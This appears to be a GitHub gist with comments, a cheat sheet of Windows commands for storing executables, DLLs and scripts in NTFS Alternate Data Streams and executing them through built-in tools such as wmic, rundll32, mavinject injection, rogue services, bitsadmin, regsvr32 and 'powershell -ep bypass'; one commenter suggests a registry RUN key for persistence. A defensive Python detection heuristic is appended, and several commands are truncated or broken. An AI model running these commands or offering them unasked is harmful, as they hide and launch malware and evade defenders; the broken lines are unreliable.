Last active June 11, 2024 15:14
Execute from Alternate Streams

Add content to ADS

type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"

extrac32 C:\ADS\ c:\ADS\file.txt:procexp.exe

findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe

certutil.exe -urlcache -split -f c:\temp:ttt

makecab c:\ADS\autoruns.exe c:\ADS\

print /D:c:\ads\file.txt:autoruns.exe c:\ads\Autoruns.exe

reg export HKLM\SOFTWARE\Microsoft\Evilreg c:\ads\file.txt:evilreg.reg

regedit /E c:\ads\file.txt:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey

expand \\webdav\folder\file.bat c:\ADS\file.txt:file.bat

esentutl.exe /y C:\ADS\autoruns.exe /d c:\ADS\file.txt:autoruns.exe /o

powershell -command " & {(Get-Content C:\ADS\file.exe -Raw | Set-Content C:\ADS\file.txt -Stream file.exe)}"

curl file://c:/temp/autoruns.exe --output c:\temp\textfile1.txt:auto.exe

cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i: ^scrobj.dll > fakefile.doc:reg32.bat

"C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.4-0\MpCmdRun.exe" -DownloadFile -url -path c:\\temp\\1.txt:7-zip.exe

msxsl.exe "" "" -o <filename>

Extract content from ADS

expand c:\ads\file.txt:test.exe c:\temp\evil.exe

esentutl.exe /Y C:\temp\file.txt:test.exe /d c:\temp\evil.exe /o

PrintBrm -r -f C:\Users\user\Desktop\ -d C:\Users\user\Desktop\new_folder

Executing from ADS


wmic process call create '"C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"'


rundll32 "C:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:ADSDLL.dll",DllMain

rundll32.exe advpack.dll,RegisterOCX not_a_dll.txt:test.dll

rundll32.exe ieadvpack.dll,RegisterOCX not_a_dll.txt:test.dll


cscript "C:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:Script.vbs"


wscript c:\ads\file.txt:script.vbs

echo GetObject("script:") > %temp%\test.txt:hi.js && wscript.exe %temp%\test.txt:hi.js


forfiles /p c:\windows\system32 /m notepad.exe /c "c:\temp\shellloader.dll:bginfo.exe"


tasklist | findstr notepad
notepad.exe                   4172 31C5CE94259D4006           2     18,476 K
type c:\temp\AtomicTest.dll > "c:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:Atomic.dll"
c:\windows\WinSxS\wow64_microsoft-windows-appmanagement-appvwow_31bf3856ad364e35_10.0.16299.15_none_e07aa28c97ebfa48\mavinject.exe 4172 /INJECTRUNNING "c:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:Atomic.dll"


mshta "C:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:helloworld.hta" (Does not work on Windows 10 1903 and newer)


control.exe c:\windows\tasks\zzz:notepad_reflective_x64.dll


sc create evilservice binPath= "\"c:\ADS\file.txt:cmd.exe\" /c echo works > \"c:\ADS\works.txt\"" DisplayName= "evilservice" start= auto
sc start evilservice


powershell -ep bypass - < c:\temp:ttt

powershell -command " & {(Get-Content C:\ADS\1.txt -Stream file.exe -Raw | Set-Content c:\ADS\file.exe) | start-process c:\ADS\file.exe}"

Invoke-CimMethod -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine = 'C:\ads\folder:file.exe'}


regedit c:\ads\file.txt:regfile.reg


bitsadmin /create myfile
bitsadmin /addfile myfile c:\windows\system32\notepad.exe c:\data\playfolder\notepad.exe
bitsadmin /SetNotifyCmdLine myfile c:\ADS\1.txt:cmd.exe NULL
bitsadmin /RESUME myfile


AppVLP.exe c:\windows\tracing\test.txt:ha.exe


cmd.exe - < fakefile.doc:reg32.bat


ftp -s:fakefile.txt:aaaa.txt

ieframe.dll , shdocvw.dll (ads)

echo [internetshortcut] > fake.txt:test.txt && echo url=C:\windows\system32\calc.exe >> fake.txt:test.txt
rundll32.exe ieframe.dll,OpenURL C:\temp\ads\fake.txt:test.txt
rundll32.exe shdocvw.dll,OpenURL C:\temp\ads\fake.txt:test.txt


echo calc > && bash <
bash.exe -c $(


type c:\Windows\System32\scrobj.dll > Textfile.txt:LoveADS
regsvr32 /s /u /i: Textfile.txt:LoveADS

Write registry

regini.exe file.txt:hidden.ini

From @elisalem9
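
For the detection side of the commands above, an added example (not part of the original gist): a heuristic that flags `file:stream` references and PowerShell `-Stream` arguments in logged process command lines. The sample lines are constructed from commands on this page plus benign ones, and all function and pattern names are this example's own.

```python
import re

# Characters that cannot occur inside a path component or stream name here.
NAME = r"""[^\s"'\\/:,<>|()=]"""

# <file>:<stream>[:$TYPE], where <file> is the last path component.
# "C:\" and "file://" never match: the colon must be followed by a name.
ADS_PATH = re.compile(rf"""
    (?<![^\s"'\\/:=<>(])                            # starts after a separator
    (?P<file>(?!-)(?={NAME}*[A-Za-z]){NAME}{{2,}})  # not a switch or drive letter
    :(?P<stream>(?={NAME}*[A-Za-z]){NAME}+)         # has a letter, so host:port is skipped
    (?::\$[A-Za-z_]+)?                              # optional type suffix such as :$DATA
    (?=$|[\s"',)])                                  # stream name ends the token
""", re.VERBOSE)

# PowerShell passes the stream name as a separate parameter instead.
PS_STREAM = re.compile(r"""-Stream\s+["']?(?P<stream>[^\s"'|)}]+)""", re.IGNORECASE)


def find_ads_references(cmdline):
    """Return (host_file, stream) pairs; host_file is None for -Stream hits."""
    hits = [(m["file"], m["stream"]) for m in ADS_PATH.finditer(cmdline)]
    hits += [(None, m["stream"]) for m in PS_STREAM.finditer(cmdline)]
    return hits


def triage(lines):
    """Return {line_number: hits} for every line that references a stream."""
    return {n: h for n, line in enumerate(lines, 1) if (h := find_ads_references(line))}


SAMPLE = [  # constructed log excerpt: command lines from this page, then benign ones
    r'rundll32 "C:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:ADSDLL.dll",DllMain',
    r'print /D:c:\ads\file.txt:autoruns.exe c:\ads\Autoruns.exe',
    r'ftp -s:fakefile.txt:aaaa.txt',
    r'powershell -ep bypass - < c:\temp:ttt',
    r'powershell -command " & {(Get-Content C:\ADS\file.exe -Raw | Set-Content C:\ADS\file.txt -Stream file.exe)}"',
    r'curl https://example.com:8443 -o C:\temp\a.txt',
    r'robocopy C:\src D:\dst /LOG:C:\logs\run.log',
]

if __name__ == "__main__":
    for number, hits in triage(SAMPLE).items():
        print(number, hits)
```

This is a triage heuristic: stream names made only of digits are skipped to avoid `host:port` noise, and a multi-letter `/switch:value` whose value is a bare name will still be flagged for review.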

D4Vinci commented Apr 12, 2018

Great work man, this helps a lot 😄

Thanks. Good to hear.

Hi. These are not persistence mechanisms. These are only ways of hiding programs within ADS and ways of executing them. How to place your persistence is up to you. For instance, a RUN key in the registry could launch the WMIC command that executes data from an Alternate Data Stream.

webs3c commented Apr 27, 2018

"powershell Start-Process -FilePath xx.exe" can execute the file too~

jmaravi commented Jun 17, 2018

Will AV detect the malicious payload?

@jmaravi - yes.

What about if you needed to delete an ADS? Not just empty it.

good job my brother and Allah Almighty will help you

MikronT commented Feb 15, 2022

That's incredible man